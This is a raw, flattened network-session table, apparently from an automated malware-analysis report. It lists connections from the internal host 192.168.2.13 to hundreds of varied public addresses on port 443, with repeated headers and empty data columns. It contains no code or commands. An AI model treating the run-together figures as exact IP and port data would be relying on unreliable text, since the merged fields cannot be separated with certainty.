                                                21497192.168.2.1346156103.79.146.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21498192.168.2.134006632.47.135.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21499192.168.2.135798696.93.206.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21500192.168.2.1339534154.91.118.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21501192.168.2.1351006112.215.18.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21502192.168.2.1343466155.124.88.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21503192.168.2.135576689.203.198.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21504192.168.2.135043020.146.204.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21505192.168.2.133464676.32.27.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21506192.168.2.133556048.203.219.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21507192.168.2.1346692183.197.38.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21508192.168.2.1346288114.234.252.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21509192.168.2.1346256210.235.221.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21510192.168.2.134214868.47.143.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21511192.168.2.134986842.254.101.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21512192.168.2.135860267.52.30.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21513192.168.2.13345664.66.26.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21514192.168.2.13428128.224.137.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21515192.168.2.1340546145.20.180.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21516192.168.2.1356900208.78.237.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21517192.168.2.134694669.63.218.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21518192.168.2.1346156115.207.187.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21519192.168.2.134414451.219.104.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21520192.168.2.1341596133.184.191.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21521192.168.2.1351454194.241.91.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21522192.168.2.1359848112.69.10.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21523192.168.2.13381065.35.75.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21524192.168.2.1358816191.89.13.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21525192.168.2.1339424138.126.205.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21526192.168.2.1336516174.104.108.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21527192.168.2.1359678201.177.69.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21528192.168.2.1358098149.180.156.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21529192.168.2.1359840222.2.19.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21530192.168.2.133939654.111.74.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21531192.168.2.1342346134.82.21.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21532192.168.2.1339796146.223.110.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21533192.168.2.1349740151.32.177.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21534192.168.2.1334674160.210.176.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21535192.168.2.135093252.41.224.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21536192.168.2.1338944112.73.194.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21537192.168.2.133684049.251.252.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21538192.168.2.135973081.127.22.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21539192.168.2.1333018101.104.57.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21540192.168.2.1356450138.54.132.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21541192.168.2.1356638113.142.226.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21542192.168.2.1357640103.128.236.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21543192.168.2.1349818211.153.13.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21544192.168.2.133827886.206.225.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21545192.168.2.134699452.229.151.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21546192.168.2.1355740193.225.95.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21547192.168.2.135820258.198.58.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21548192.168.2.135662071.184.103.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21549192.168.2.134471679.212.97.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21550192.168.2.135321047.57.155.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21551192.168.2.1353736142.222.191.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21552192.168.2.133752445.76.91.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21553192.168.2.1351486143.194.248.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21554192.168.2.1351040119.146.133.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21555192.168.2.1340222140.101.22.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21556192.168.2.133462493.43.4.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21557192.168.2.1342552126.94.36.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21558192.168.2.1350582134.185.90.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21559192.168.2.13564464.194.117.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21560192.168.2.133741618.227.111.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21561192.168.2.1352952128.40.244.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21562192.168.2.1336980221.61.99.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21563192.168.2.133790085.228.89.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21564192.168.2.134068020.84.119.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21565192.168.2.133521276.241.123.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21566192.168.2.1348600164.44.88.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21567192.168.2.136099667.218.151.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21568192.168.2.13520182.190.146.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21569192.168.2.1345822169.47.14.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21570192.168.2.134077834.105.24.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21571192.168.2.134928858.200.247.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21572192.168.2.1338078220.73.59.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21573192.168.2.1343542180.182.249.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21574192.168.2.133876479.92.116.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21575192.168.2.135721837.249.160.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21576192.168.2.1342584135.111.10.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21577192.168.2.134760014.169.96.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21578192.168.2.1346626132.6.63.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21579192.168.2.1357316179.84.215.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21580192.168.2.135482819.165.0.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21581192.168.2.134213299.247.149.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21582192.168.2.134060625.170.211.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21583192.168.2.1348876132.147.19.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21584192.168.2.1335364191.183.130.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21585192.168.2.1344252139.219.32.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21586192.168.2.134249613.189.84.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21587192.168.2.135276284.180.233.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21588192.168.2.133911845.214.196.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21589192.168.2.136079664.27.247.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21590192.168.2.133881440.13.106.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21591192.168.2.1343482114.28.223.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21592192.168.2.1346060140.68.61.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21593192.168.2.1345418141.31.21.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21594192.168.2.133815477.197.165.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21595192.168.2.136004462.69.26.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21596192.168.2.1359304115.91.22.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21597192.168.2.1335374212.229.210.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21598192.168.2.1348998106.141.114.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21599192.168.2.1335580121.127.6.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21600192.168.2.1352526110.92.202.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21601192.168.2.1359342180.61.89.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21602192.168.2.1347668105.53.123.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21603192.168.2.1341836204.81.79.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21604192.168.2.133657639.107.232.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21605192.168.2.1342616143.119.216.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21606192.168.2.135256499.118.246.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21607192.168.2.1341076118.80.62.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21608192.168.2.134074673.8.112.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21609192.168.2.135166076.45.176.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21610192.168.2.1348472139.96.40.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21611192.168.2.1346670189.162.243.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21612192.168.2.133989473.241.241.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21613192.168.2.1336880216.241.100.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21614192.168.2.133785078.131.212.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21615192.168.2.1340030159.77.203.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21616192.168.2.1333654108.17.88.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21617192.168.2.134863085.59.139.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21618192.168.2.135374063.150.123.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21619192.168.2.1355704207.95.120.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21620192.168.2.134631854.0.169.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21621192.168.2.1346662101.144.15.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21622192.168.2.1342382105.187.134.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21623192.168.2.1344534114.239.20.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21624192.168.2.1348256149.54.10.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21625192.168.2.136023872.220.2.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21626192.168.2.134560657.139.81.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21627192.168.2.1352388124.124.27.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21628192.168.2.1341362169.166.37.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21629192.168.2.135796095.148.242.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21630192.168.2.1358534108.169.115.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21631192.168.2.135003225.246.187.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21632192.168.2.135152490.61.170.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21633192.168.2.1350290149.227.137.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21634192.168.2.1351308133.119.56.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21635192.168.2.1360194108.66.9.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21636192.168.2.1337244218.2.99.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21637192.168.2.134144852.185.239.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21638192.168.2.1340312172.125.107.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21639192.168.2.1339072182.84.20.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21640192.168.2.134072890.114.205.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21641192.168.2.133309818.91.94.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21642192.168.2.1357592147.139.123.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21643192.168.2.1352208216.59.152.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21644192.168.2.1347326141.75.178.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21645192.168.2.1355218130.108.193.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21646192.168.2.135231465.38.165.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21647192.168.2.1332832206.22.23.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21648192.168.2.135643244.234.231.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21649192.168.2.135355487.189.54.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21650192.168.2.134705427.85.17.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21651192.168.2.1336508185.228.48.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21652192.168.2.1349294169.79.230.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21653192.168.2.1343232117.180.50.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21654192.168.2.1343066168.143.185.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21655192.168.2.135353034.43.118.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21656192.168.2.133335264.4.223.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21657192.168.2.1360114166.188.160.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21658192.168.2.134714218.45.85.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21659192.168.2.1352892175.26.104.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21660192.168.2.1348066187.202.59.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21661192.168.2.1342330144.71.55.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21662192.168.2.1350778188.100.5.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21663192.168.2.134692453.93.167.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21664192.168.2.133456063.199.121.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21665192.168.2.134687450.150.22.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21666192.168.2.1344142222.40.192.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21667192.168.2.1353390194.153.251.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21668192.168.2.133868894.34.54.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21669192.168.2.1344324143.182.20.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21670192.168.2.1349202130.67.121.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21671192.168.2.1345804167.73.203.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21672192.168.2.134633884.228.178.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21673192.168.2.135809054.1.169.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21674192.168.2.1356462110.190.70.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21675192.168.2.135316294.72.143.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21676192.168.2.134168224.139.72.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21677192.168.2.134417069.211.14.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21678192.168.2.1333826106.15.71.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21679192.168.2.135897253.55.130.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21680192.168.2.134775649.74.177.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21681192.168.2.135506298.80.217.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21682192.168.2.1349302162.184.204.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21683192.168.2.1348784187.56.71.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21684192.168.2.1353698192.40.144.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21685192.168.2.1347278218.8.103.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21686192.168.2.1357270179.129.59.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21687192.168.2.133344294.109.99.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21688192.168.2.1353192122.116.118.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21689192.168.2.1334782206.90.28.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21690192.168.2.135064464.53.37.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21691192.168.2.133538060.192.133.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21692192.168.2.134253857.0.199.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21693192.168.2.1338440165.173.34.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21694192.168.2.135740225.165.141.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21695192.168.2.1344906134.183.30.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21696192.168.2.1349184220.30.85.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21697192.168.2.1337484162.148.211.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21698192.168.2.133949463.118.192.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21699192.168.2.1354948217.36.164.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21700192.168.2.1355206203.66.182.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21701192.168.2.1357472185.81.125.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21702192.168.2.13582205.113.122.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21703192.168.2.1340308120.12.173.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21704192.168.2.134540845.85.97.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21705192.168.2.134681686.116.207.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21706192.168.2.1339078134.197.99.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21707192.168.2.135524838.170.7.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21708192.168.2.1358082169.221.41.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21709192.168.2.1350262203.200.98.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21710192.168.2.135059245.147.240.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21711192.168.2.1343710117.201.180.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21712192.168.2.1341788102.222.92.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21713192.168.2.134563052.106.185.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21714192.168.2.1340888133.228.44.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21715192.168.2.134477841.188.180.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21716192.168.2.1350020126.214.229.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21717192.168.2.1333262212.20.26.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21718192.168.2.135620414.151.155.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
